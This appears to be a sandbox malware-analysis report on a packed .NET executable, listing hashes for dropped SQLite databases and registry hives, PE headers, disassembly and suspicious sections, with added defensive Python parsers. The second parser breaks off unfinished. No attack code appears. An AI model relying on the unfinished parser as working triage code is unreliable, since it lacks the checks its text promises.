                                          SHA1:CDCCC11837CDDB657EB0EF6A01202451ECDF4992
                                          SHA-256:BA7EB45B7E9B6990BC63BE63836B74FA2CCB64DCD0C199056B6AE37B1AE735F2
                                          SHA-512:FF0692E52368708B36C161A4BFA91EE01CCA1B86F66666F7FC4979C6792D598FF7720A9FAF258F61439DAD61DB55C50D992E99769B1E4D321EC5B98230684BC5
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................S`.....}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Desktop\bPkG0wTVon.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3036000, page size 32768, file counter 2, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 2
                                          Category:dropped
                                          Size (bytes):294912
                                          Entropy (8bit):0.08434615749937499
                                          Encrypted:false
                                          SSDEEP:192:2va0zkVmvQhyn+Zoz679fqlQbGhMHPaVAL23vPY:21zkVmvQhyn+Zoz67R
                                          MD5:93BAA1B7500F3ADB16BE27FCB2E256A8
                                          SHA1:77CB640557F5F7950B083405B4AEE0573D11D98F
                                          SHA-256:7C24FE957EFB0DDF026ECDD88027BE5B40863342CF2CF2A5A7FF72062F75B1E9
                                          SHA-512:C53D09227E5069924E49823CD6E93775B98439D57D279BEEFFE14EA057BF9D9882CE1BC297C0181D0309E027E7993F079D6BF4933A929D2C942903D28DB155AB
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................S`.....z<.{...{.{a{.z.z<z.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Desktop\bPkG0wTVon.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3036000, file counter 10, database pages 7, 1st free page 5, free pages 2, cookie 0x9, schema 4, UTF-8, version-valid-for 10
                                          Category:dropped
                                          Size (bytes):28672
                                          Entropy (8bit):1.5161495002712742
                                          Encrypted:false
                                          SSDEEP:96:s3n5HGsht8kAM0hsYfxqYgXZBqIcsrl3tuY2sWsqF:c5mF5wnpx9uYSF
                                          MD5:16A6EDF5F48F2A7B20B3B8825384B05C
                                          SHA1:A59542299A41166F515B18AB8CBC3D72517ED207
                                          SHA-256:3E1A2BB358B396C201A6058EC8A05E25B167255EB3DAEEB1130331A298CC6F93
                                          SHA-512:7C4C9D69B05EA5B120C0DB6DF7D0C4487387659AF6D17C387503CA360EF8430F676B0964B6BC3C368BA4DC8D0E648B2750C26970D833788982BBF5BC04AC632D
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................S`..=......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Desktop\bPkG0wTVon.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 3, database pages 27, 1st free page 7, free pages 2, cookie 0x13, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):57344
                                          Entropy (8bit):0.7310370201569906
                                          Encrypted:false
                                          SSDEEP:96:qsvKLyeymO9K3PlGNxotxPUCbn8MouON3n:q86PlGNxss27e
                                          MD5:A802F475CA2D00B16F45FEA728F2247C
                                          SHA1:AF57C02DA108CFA0D7323252126CC87D7B608786
                                          SHA-256:156ADDC0B949718CF518720E5774557B134CCF769A15E0413ABC257C80E58684
                                          SHA-512:275704B399A1C236C730F4702B57320BD7F034DC234B7A820452F8C650334233BD6830798446664F133BA4C77AA2F91E66E901CE8A11BD8575C2CD08AB9BE98F
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................S`....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Desktop\bPkG0wTVon.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 7, database pages 59, cookie 0x52, schema 4, UTF-8, version-valid-for 7
                                          Category:dropped
                                          Size (bytes):122880
                                          Entropy (8bit):1.1414673161713362
                                          Encrypted:false
                                          SSDEEP:192:8t4nKTjebGA7j9p/XH9eQ3KvphCNKRmquPWTPVusE6:8t4n/9p/39J6hwNKRmqu+7VusE
                                          MD5:24937DB267D854F3EF5453E2E54EA21B
                                          SHA1:F519A77A669D9F706D5D537A203B7245368D40CE
                                          SHA-256:369B8B4465FB5FD7F12258C7DEA941F9CCA9A90C78EE195DF5E02028686869ED
                                          SHA-512:AED398C6781300E732105E541A6FDD762F04E0EC5A5893762BFDCBDD442348FAF9CB2711EFDC4808D4675A8E48F77BEAB3A0D6BC635B778D47B2DADC9B6086A3
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......;...........R......................................................S`...........5........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Desktop\bPkG0wTVon.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 7, database pages 59, cookie 0x52, schema 4, UTF-8, version-valid-for 7
                                          Category:dropped
                                          Size (bytes):122880
                                          Entropy (8bit):1.1414673161713362
                                          Encrypted:false
                                          SSDEEP:192:8t4nKTjebGA7j9p/XH9eQ3KvphCNKRmquPWTPVusE6:8t4n/9p/39J6hwNKRmqu+7VusE
                                          MD5:24937DB267D854F3EF5453E2E54EA21B
                                          SHA1:F519A77A669D9F706D5D537A203B7245368D40CE
                                          SHA-256:369B8B4465FB5FD7F12258C7DEA941F9CCA9A90C78EE195DF5E02028686869ED
                                          SHA-512:AED398C6781300E732105E541A6FDD762F04E0EC5A5893762BFDCBDD442348FAF9CB2711EFDC4808D4675A8E48F77BEAB3A0D6BC635B778D47B2DADC9B6086A3
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......;...........R......................................................S`...........5........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Desktop\bPkG0wTVon.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 7, database pages 59, cookie 0x52, schema 4, UTF-8, version-valid-for 7
                                          Category:dropped
                                          Size (bytes):122880
                                          Entropy (8bit):1.1414673161713362
                                          Encrypted:false
                                          SSDEEP:192:8t4nKTjebGA7j9p/XH9eQ3KvphCNKRmquPWTPVusE6:8t4n/9p/39J6hwNKRmqu+7VusE
                                          MD5:24937DB267D854F3EF5453E2E54EA21B
                                          SHA1:F519A77A669D9F706D5D537A203B7245368D40CE
                                          SHA-256:369B8B4465FB5FD7F12258C7DEA941F9CCA9A90C78EE195DF5E02028686869ED
                                          SHA-512:AED398C6781300E732105E541A6FDD762F04E0EC5A5893762BFDCBDD442348FAF9CB2711EFDC4808D4675A8E48F77BEAB3A0D6BC635B778D47B2DADC9B6086A3
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......;...........R......................................................S`...........5........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Desktop\bPkG0wTVon.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3045002, page size 2048, file counter 4, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 4
                                          Category:dropped
                                          Size (bytes):49152
                                          Entropy (8bit):0.86528072116055
                                          Encrypted:false
                                          SSDEEP:96:kTN7KLWlGxdKmtZeympbn8MouB6w9f/rrGMa:qVlGxdKN7Iw9fj
                                          MD5:8CC409C8658C3F05143C1484A1719879
                                          SHA1:909CDE14664C0E5F943764895E0A9DFEC7831FF5
                                          SHA-256:BC69C3518DA2ABC8904F314F078D9672BAF3B840E09FD2B2E95D4B07A03A85A4
                                          SHA-512:55D8923B6481ADF442817B7BAA50C36CBAD8DAC0EC600451813D29F4775DE519A06158A6233E61635CD0ED862E60AC7F50C75556C4E89D583D8A8A4299F1808F
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................v.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Desktop\bPkG0wTVon.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3045002, page size 2048, file counter 14, database pages 65, cookie 0x57, schema 4, UTF-8, version-valid-for 14
                                          Category:dropped
                                          Size (bytes):135168
                                          Entropy (8bit):1.0873605234887023
                                          Encrypted:false
                                          SSDEEP:192:yD1DgPn0BkoOQuA5bUWDX6+7VuP7Ewvjd:A1cPn0BktQuubrt7VuP7Ewrd
                                          MD5:5B01CD9FA62FDF35D1A4587F2676CA31
                                          SHA1:25BBFAC890114F4ECE0BF818F504FFE6102004B8
                                          SHA-256:74D3D72E8CEB233D400747C902F3331B3824902C81B6EF8AA3D7AC85A7A3F095
                                          SHA-512:A565038CDF3C69621F31D8DE4558F74375AADF1DC881C2C82A877C105437F7F9B1D97D1652E98566984EFCA8F1C39224B40B450C742610395A265D81362254DC
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......A...........W......................................................v............A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Desktop\bPkG0wTVon.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3045002, page size 2048, file counter 14, database pages 65, cookie 0x57, schema 4, UTF-8, version-valid-for 14
                                          Category:dropped
                                          Size (bytes):135168
                                          Entropy (8bit):1.0873605234887023
                                          Encrypted:false
                                          SSDEEP:192:yD1DgPn0BkoOQuA5bUWDX6+7VuP7Ewvjd:A1cPn0BktQuubrt7VuP7Ewrd
                                          MD5:5B01CD9FA62FDF35D1A4587F2676CA31
                                          SHA1:25BBFAC890114F4ECE0BF818F504FFE6102004B8
                                          SHA-256:74D3D72E8CEB233D400747C902F3331B3824902C81B6EF8AA3D7AC85A7A3F095
                                          SHA-512:A565038CDF3C69621F31D8DE4558F74375AADF1DC881C2C82A877C105437F7F9B1D97D1652E98566984EFCA8F1C39224B40B450C742610395A265D81362254DC
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......A...........W......................................................v............A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Desktop\bPkG0wTVon.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3045002, file counter 7, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 7
                                          Category:dropped
                                          Size (bytes):20480
                                          Entropy (8bit):1.4026573159402624
                                          Encrypted:false
                                          SSDEEP:48:TB9aw/aHLopFMavU1/iB8eVC+rQ88TkQqp8JHyDlEKw0esEieNp:1PareMa8K8eVC+rZ8TkQqpWSDlNufp
                                          MD5:F49DFF163167A43F4940B7337A092C07
                                          SHA1:1A8BAAC92537FA0BD39063D17C3072AD86190CC4
                                          SHA-256:B3D38278030DBEA9D1CDDC177F9B6CB590CE1D383A88211B231402B7CA208CF3
                                          SHA-512:BC7685763D70300FE2AE28803D9F886D91004F6045A995065FAAEB6A9DFCAB77E80B475516E9B4C1F8969E112E2B48C7E68FC2AB15F61BB69443A8C54E24066F
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................v.......@..g.....@....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Desktop\bPkG0wTVon.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3045002, page size 2048, file counter 14, database pages 65, cookie 0x57, schema 4, UTF-8, version-valid-for 14
                                          Category:dropped
                                          Size (bytes):135168
                                          Entropy (8bit):1.0873605234887023
                                          Encrypted:false
                                          SSDEEP:192:yD1DgPn0BkoOQuA5bUWDX6+7VuP7Ewvjd:A1cPn0BktQuubrt7VuP7Ewrd
                                          MD5:5B01CD9FA62FDF35D1A4587F2676CA31
                                          SHA1:25BBFAC890114F4ECE0BF818F504FFE6102004B8
                                          SHA-256:74D3D72E8CEB233D400747C902F3331B3824902C81B6EF8AA3D7AC85A7A3F095
                                          SHA-512:A565038CDF3C69621F31D8DE4558F74375AADF1DC881C2C82A877C105437F7F9B1D97D1652E98566984EFCA8F1C39224B40B450C742610395A265D81362254DC
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......A...........W......................................................v............A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
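The "File Type" lines for the dropped SQLite databases above are all derived from the 100-byte SQLite file header, and the same fields can be read offline without opening a stolen copy in a SQLite client. The block below is an added example, not code from the report, the sandbox or the analysed sample: it assembles a header with the values reported above (a constructed fixture, not the real dropped file), parses it back, renders the same summary wording the report uses and returns the size the header claims. The page count times page size (65 × 2048 = 133120) is smaller than the 135168 bytes these copies occupy on disk, which is the kind of mismatch worth checking before trusting a copied database, since the in-header page count is only valid when the version-valid-for number equals the change counter.

```python
"""Parse the 100-byte SQLite 3 file header (added example, not part of the report)."""
import struct

SQLITE_MAGIC = b"SQLite format 3\x00"
ENCODINGS = {1: "UTF-8", 2: "UTF-16le", 3: "UTF-16be"}


def is_sqlite_header(data):
    return len(data) >= 100 and data[:16] == SQLITE_MAGIC


def build_sqlite_header(page_size, change_counter, db_pages, schema_cookie,
                        schema_format, encoding, version_valid_for, sqlite_version):
    """Assemble a header with the given fields (constructed test input, not a real file)."""
    hdr = bytearray(100)
    hdr[0:16] = SQLITE_MAGIC
    # Offset 16: page size, big-endian; 65536 is stored as the value 1.
    struct.pack_into(">H", hdr, 16, 1 if page_size == 65536 else page_size)
    hdr[18] = hdr[19] = 1                     # write/read format versions (1 = legacy, 2 = WAL)
    hdr[21], hdr[22], hdr[23] = 64, 32, 32    # payload fractions, fixed by the format
    struct.pack_into(">II", hdr, 24, change_counter, db_pages)
    struct.pack_into(">II", hdr, 40, schema_cookie, schema_format)
    struct.pack_into(">I", hdr, 56, encoding)
    struct.pack_into(">II", hdr, 92, version_valid_for, sqlite_version)
    return bytes(hdr)


def parse_sqlite_header(data):
    """Return the header fields a triage report needs; raises on a non-SQLite blob."""
    if not is_sqlite_header(data):
        raise ValueError("not an SQLite 3 database header")
    page_size = struct.unpack_from(">H", data, 16)[0]
    page_size = 65536 if page_size == 1 else page_size
    change_counter, db_pages = struct.unpack_from(">II", data, 24)
    schema_cookie, schema_format = struct.unpack_from(">II", data, 40)
    encoding = struct.unpack_from(">I", data, 56)[0]
    version_valid_for, version_number = struct.unpack_from(">II", data, 92)
    major, rest = divmod(version_number, 1_000_000)   # SQLITE_VERSION_NUMBER = X*1000000 + Y*1000 + Z
    minor, patch = divmod(rest, 1_000)
    return {
        "page_size": page_size,
        "write_version": data[18],
        "read_version": data[19],
        "change_counter": change_counter,
        "db_pages": db_pages,
        # The in-header page count is only trustworthy when these two counters agree.
        "db_pages_valid": db_pages != 0 and version_valid_for == change_counter,
        "schema_cookie": schema_cookie,
        "schema_format": schema_format,
        "encoding": ENCODINGS.get(encoding, "unknown(%d)" % encoding),
        "version_valid_for": version_valid_for,
        "sqlite_version_number": version_number,
        "sqlite_version": "%d.%d.%d" % (major, minor, patch),
    }


def summarize(data):
    """Render the fields in the same wording the sandbox uses for its File Type line."""
    h = parse_sqlite_header(data)
    return ("SQLite 3.x database, last written using SQLite version {sqlite_version_number}, "
            "page size {page_size}, file counter {change_counter}, database pages {db_pages}, "
            "cookie {schema_cookie:#x}, schema {schema_format}, {encoding}, "
            "version-valid-for {version_valid_for}").format(**h)


def expected_file_size(data):
    """Size the header claims; compare with the on-disk size before trusting a copied DB."""
    h = parse_sqlite_header(data)
    return h["db_pages"] * h["page_size"]


# Header carrying the values reported for the 135168-byte dropped files above (constructed).
SAMPLE_HEADER = build_sqlite_header(page_size=2048, change_counter=14, db_pages=65,
                                    schema_cookie=0x57, schema_format=4, encoding=1,
                                    version_valid_for=14, sqlite_version=3045002)

if __name__ == "__main__":
    print(summarize(SAMPLE_HEADER))
    print("header claims %d bytes" % expected_file_size(SAMPLE_HEADER))
```

Run it against a real dropped file by passing the first 100 bytes of the file to `summarize`; the magic check means a renamed or truncated blob raises instead of being misreported.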
                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                          File Type:MS Windows registry file, NT/2000 or above
                                          Category:dropped
                                          Size (bytes):2359296
                                          Entropy (8bit):4.361358938038657
                                          Encrypted:false
                                          SSDEEP:49152:q1AhNXBlw3Ak2BGUM5Dc0Uag6nSz8a8aO:z
                                          MD5:40701DFEB060178BEA0216F2A1202E85
                                          SHA1:E866FC61A6E098188E78E8FA63998E2ABF2210B9
                                          SHA-256:6FA4F0CE535D18AC4A5C653CBC34719D27ADB661B24F72363008292019B10230
                                          SHA-512:F0F01789A8EA7621407492FCF4CAED1A1A3D1FFE96EA33CBA2715746CB872C88CB5904896CE022B6696DFFED0F06E4F2D221C990C36FCEEBE56511A437FC3639
                                          Malicious:false
                                          Preview:regf........5.#.^................... .....!.....\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e......Q......P..#....Q......P..#........Q......P..#.rmtm..c..Q..............................................................................................................................................................................................................................................................................................................................................R..<........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                          File Type:MS Windows registry file, NT/2000 or above
                                          Category:dropped
                                          Size (bytes):77824
                                          Entropy (8bit):4.646001791237352
                                          Encrypted:false
                                          SSDEEP:768:rqQyP8n92v+FS8YTAbCRlLlPSRy2uiruMxYVd8dMwW2G2P5fRFrsJpyG2gKOrndh:mdik9CuiruRKxRFrsJdNYPiigyf
                                          MD5:6AD26ECFF37D20F0626FC381E9E82B57
                                          SHA1:7B758121BB0001DD015408BAD6EB8340676513B2
                                          SHA-256:FBB6FDB0FE256EF5B68F010379C2A4130C55483051391F955D3CD398A0C9A51E
                                          SHA-512:5BF093045BBEB07F04902620CE7FD1BA92598AD1AFB279704FCEC81E65AE0FE9886948C6AC7BA70DC239A15CCEB0CCFD10475BEF96B458D38D87AC139DF36B99
                                          Malicious:false
                                          Preview:regf........5.#.^................... .....!.....\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e......Q......P..#....Q......P..#........Q......P..#.rmtm..c..Q..............................................................................................................................................................................................................................................................................................................................................T..<HvLE..............!......9..........Kd....................... ... .......p...............................P.......p.......................`... ..........................hbin................5.#.^...........nk,....S.......H.......................................................&...{11517B7C-E79D-4e20-961B-75A811715ADD}......nk .....9......(...........@...............................*...N.......)...InventoryMiscellaneousMemorySlotArrayInfo....................mG.....nk .$4./T....... ...
                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Entropy (8bit):7.381035863719706
                                          TrID:
                                          • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                          • Win32 Executable (generic) a (10002005/4) 49.96%
                                          • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                          • DOS Executable Generic (2002/1) 0.01%
                                          File name:bPkG0wTVon.exe
                                          File size:3'084'288 bytes
                                          MD5:36274aefe69f86532cee326b878f06ff
                                          SHA1:6a33fb45bfa496c8559947640ae044b1d78d39b8
                                          SHA256:24616a11af126a9d80991d575949abcef8b0e30b816a1ddc3e1d0f63fe380e89
                                          SHA512:d166256935a99047ab55fa0d7c613435f2bd3afc5369dabb45f7866622a171d078a1c92f97f5fb7334466221d9dc9a2e295a778d8c22c81e666db271e3b63d42
                                          SSDEEP:49152:wRAJl5aVqggHv4KAOV6AEnSgRIgtZMZKYTMFOZPNF2fdMrngQQ:wsvJAKR4AEnFIe8KYTYCN02rnzQ
                                          TLSH:17E5CF1836DCAD51D9BB1339D4A000F8D6F27B01B692DBABA92873D52F0E3847E1D257
                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....bg................................. ... ....@.. ......................../...........`................................
                                          Icon Hash:90cececece8e8eb0
                                          Entrypoint:0x4f1ee6
                                          Entrypoint Section:.text
                                          Digitally signed:false
                                          Imagebase:0x400000
                                          Subsystem:windows gui
                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                          Time Stamp:0x6762DFC3 [Wed Dec 18 14:44:19 2024 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:
                                          OS Version Major:4
                                          OS Version Minor:0
                                          File Version Major:4
                                          File Version Minor:0
                                          Subsystem Version Major:4
                                          Subsystem Version Minor:0
                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
Instruction (entrypoint disassembly; only the first jmp is real code: it goes through the IAT slot at 0x4F1EF4 to mscoree!_CorExeMain, the standard .NET loader stub, and the bytes that follow are the import address table, debug directory and import data decoded as if they were instructions)
                                          jmp dword ptr [004F1EF4h]
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          enter 0F1Eh, 00h
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          ret
                                          fbld [edx+67h]
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add al, byte ptr [eax]
                                          add byte ptr [eax], al
                                          pop edx
                                          add byte ptr [eax], al
                                          add byte ptr [eax], bl
                                          pop ds
                                          ltr word ptr [eax]
                                          add dword ptr [edi], ecx
                                          add byte ptr [edx+53h], dl
                                          inc esp
                                          push ebx
                                          punpcklwd mm4, mm1
                                          xchg eax, esp
                                          xchg eax, ebx
                                          loope 00007F6FECBB9E8Ah
                                          inc edx
                                          mov dl, FFh
                                          mov ecx, 0DBD3E20h
                                          sbb eax, 00000001h
                                          inc ebx
                                          cmp bl, byte ptr [ebp+edx*2+73h]
                                          jc 00007F6FECBB9E96h
                                          pop esp
                                          push edx
                                          popad
                                          imul esp, dword ptr [esi+6Fh], 6F735C6Eh
                                          jne 00007F6FECBB9E94h
                                          arpl word ptr [ebp+5Ch], sp
                                          jc 00007F6FECBB9E87h
                                          jo 00007F6FECBB9E91h
                                          jnc 00007F6FECBB9E7Eh
                                          inc ecx
                                          jc 00007F6FECBB9E85h
                                          popad
                                          outsb
                                          popad
                                          pop esp
                                          inc ecx
                                          jc 00007F6FECBB9E85h
                                          popad
                                          outsb
                                          popad
                                          pop esp
                                          bound ebp, dword ptr [ecx+6Eh]
                                          pop esp
                                          push edx
                                          insb
                                          popad
                                          jnc 00007F6FECBB9E87h
                                          pop esp
                                          inc ecx
                                          jc 00007F6FECBB9E85h
                                          popad
                                          outsb
                                          popad
                                          jo 00007F6FECBB9E87h
                                          bound eax, dword ptr [eax]
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0xf1e98          0x4c          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x2f4000         0x596         .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x2f6000         0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0xf1efc          0x1c          .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0xf1ef4          0x8           .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x29e450         0x48          ."@W
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity     File Type               Entropy              Characteristics
.text   0x2000           0xeff72       0xf0000   3e94d5bae1d0bb960c8f5f28afe5203d  False     0.7792093912760417  data                    7.540602371038387    IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.\C3    0xf2000          0x18465f      0x184800  2aa325b1d86903a44633411c262b0663  False     0.7537881073037324  COM executable for DOS  7.349314887296056    IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
."@W    0x278000         0x7bb70       0x7bc00   51bb4349e5e634be3720f66baf47f03c  False     0.4955531881313131  OpenPGP Secret Key      6.421264542672329    IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc   0x2f4000         0x596         0x600     0526fa3a22a873f725c4c611e71e0f25  False     0.4140625           data                    4.035639834367624    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0x2f6000         0xc           0x200     b66d2ab5fddf98e5b0436566a1645f55  False     0.048828125         data                    0.12227588125913882  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
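The section names in this table are not ones a compiler or linker emits: `.\C3` and `."@W` are both marked executable, sit at entropy above 7 next to a `.text` that is itself above 7.5, and the CLR header (IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR) lives in `."@W` rather than in `.text`, which is where a normal .NET build keeps it. The block below is an added example, not code from the report, the sandbox or the sample: a minimal PE32 header and section-table parser that reads the COFF link timestamp, the entrypoint RVA and each section's name, rights and byte entropy, and flags the points a triage analyst checks first. The image it parses is built by `build_pe32`, a constructed header-only fixture that copies the first four rows of the table above; the real section contents are not on this page, so a 1024-byte filler pattern with entropy 8.0 stands in for the packed section body.

```python
"""Static triage of a PE32 section table (added example, not from the report)."""
import re
import struct
from datetime import datetime, timezone
from math import log2

IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
# Names a linker normally emits: optional dot plus alphanumerics (.text, .rsrc, CODE, .00cfg).
NORMAL_NAME = re.compile(rb"^\.?[A-Za-z0-9_$]+$")
HIGH_ENTROPY = 7.0          # bits per byte; packed or encrypted payloads sit above this


def shannon_entropy(buf):
    if not buf:
        return 0.0
    counts = [0] * 256
    for b in buf:
        counts[b] += 1
    n = len(buf)
    return -sum(c / n * log2(c / n) for c in counts if c)


def build_pe32(sections, entry_rva, timestamp):
    """Assemble a header-only PE32 (constructed fixture; not a loadable image).

    sections: list of (name, virtual_address, virtual_size, characteristics, raw_bytes).
    Raw bytes are appended directly after the section table with no file alignment.
    """
    headers_len = 64 + 4 + 20 + 224 + 40 * len(sections)
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 60, 64)                    # e_lfanew -> PE signature
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), timestamp, 0, 0, 224, 0x0102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                  # PE32 magic
    struct.pack_into("<I", opt, 16, entry_rva)             # AddressOfEntryPoint
    table, payload = b"", b""
    for name, va, vsize, chars, raw in sections:
        rawptr = headers_len + len(payload) if raw else 0
        table += struct.pack("<8sIIIIIIHHI", name, vsize, va, len(raw), rawptr, 0, 0, 0, 0, chars)
        payload += raw
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + table + payload


def parse_pe32(data):
    """Read the COFF header, entrypoint and section table; nothing in the file is executed."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    pe = struct.unpack_from("<I", data, 60)[0]
    if data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    _machine, nsec, ts, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, pe + 4)
    opt = pe + 24
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]
    sections = []
    for i in range(nsec):
        name, vsize, va, rawsize, rawptr, _, _, _, _, chars = struct.unpack_from(
            "<8sIIIIIIHHI", data, opt + opt_size + 40 * i)
        raw = data[rawptr:rawptr + rawsize] if rawptr else b""
        sections.append({"name": name.rstrip(b"\0").decode("latin-1"), "va": va,
                         "vsize": vsize, "rawsize": rawsize, "chars": chars,
                         "entropy": shannon_entropy(raw)})
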